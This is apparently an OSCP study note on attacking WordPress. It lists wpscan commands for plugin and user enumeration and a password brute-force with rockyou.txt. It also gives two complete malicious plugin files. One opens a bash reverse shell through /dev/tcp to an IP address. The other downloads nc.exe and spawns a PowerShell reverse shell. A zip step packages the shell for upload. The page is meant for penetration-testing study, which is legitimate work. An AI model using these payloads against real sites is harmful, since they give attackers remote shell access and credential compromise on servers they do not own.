// notes/ Service Enumeration
📡

Misc Wordpress

Notes from oscp.adot8.com — services.

#services#adot8
source · oscp.adot8.com · services/misc_wordpress

WordPress

code
01wpscan --url $url
02wpscan --url $url -e vp <- Vulnerable plugins
03wpscan --url $url -e cb <- Config backups
04wpscan --url $url -e p --plugins-detection aggressive
code
01wpscan --url $url -U users.txt -P ~/rockyou.txt

Visit the wp-content/plugins directory to view installed plugins

Reverse shell

{% hint style="info" %} You can also catch a reverse shell by editing Appearance > Editor > index.php {% endhint %}

code
01<?php
02
03/**
04* Plugin Name: Reverse Shell Plugin
05* Plugin URI:
06* Description: Reverse Shell Plugin
07* Version: 1.0
08* Author: Vince Matteo
09* Author URI: http://www.sevenlayers.com
10*/
11
12exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.214/1337 0>&1'");
13?>
code
01<?php
02
03/**
04* Plugin Name: Reverse Shell Plugin
05* Plugin URI:
06* Description: Reverse Shell Plugin
07* Version: 1.0
08* Author: Vince Matteo
09* Author URI: http://www.sevenlayers.com
10*/
11
12system("powershell -c curl http://192.168.45.239/nc.exe -o C:\\programdata\\nc.exe");
13system("C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe");
14?>
code
01zip shell.zip shell.php